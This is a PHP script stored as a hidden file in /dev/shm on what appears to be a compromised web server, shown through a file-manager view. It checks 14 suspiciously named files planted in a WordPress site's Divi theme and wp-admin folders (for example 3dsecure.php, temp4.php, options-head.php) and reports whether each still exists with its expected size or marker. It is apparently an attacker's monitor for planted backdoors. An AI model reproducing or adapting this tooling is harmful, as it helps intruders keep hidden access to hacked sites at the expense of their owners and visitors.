Current File : //proc/thread-self/root/dev/shm/.hld
<?php   $r = '/home/watfordpizza/public_html'; $x = ["/wp-content/themes/Divi/includes/builder/module/helpers/motion/album_page.php"=>"bd@@114435@@776",
"/wp-content/themes/Divi/includes/builder/module/field/attribute/composite/type/temp4.php"=>"bd@@97560@@627",
"/wp-content/themes/Divi/cloud/i18n/library/layouts.php"=>"bd@@114503@@1956",
"/wp-content/themes/Divi/includes/builder/module/field/template/border/uc.php"=>"bd@@107651@@671",
"/wp-admin/site-health-info.php"=>"bd@@126084@@hub_center",
"/wp-admin/options-head.php"=>"bd@@126087@@data_storage",
"/wp-content/themes/Divi/includes/builder/module/field/URI.php"=>"bd@@107675@@621",
"/wp-content/themes/Divi/includes/builder/feature/global-presets/3dsecure.php"=>"bd@@107691@@666",
"/wp-content/themes/Divi/includes/builder/feature/display-conditions/jobposts_old.php"=>"bd@@107720@@625",
"/wp-content/themes/Divi/includes/builder/post/query/auctionapproval.php"=>"bd@@107735@@1517",
"/wp-content/themes/Divi/includes/builder/feature/woocommerce/templates/cart/cross.totals.php"=>"bd@@126167@@590",
"/wp-content/themes/Divi/includes/builder/feature/gutenberg/scheduler.php"=>"bd@@126174@@1664",
"/wp-content/themes/Divi/includes/builder/core.php"=>"bd@@114417@@api_gateway",
"/wp-content/themes/Divi/includes/builder/feature/background-masks/pattern/zig.php"=>"bd@@114449@@615"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');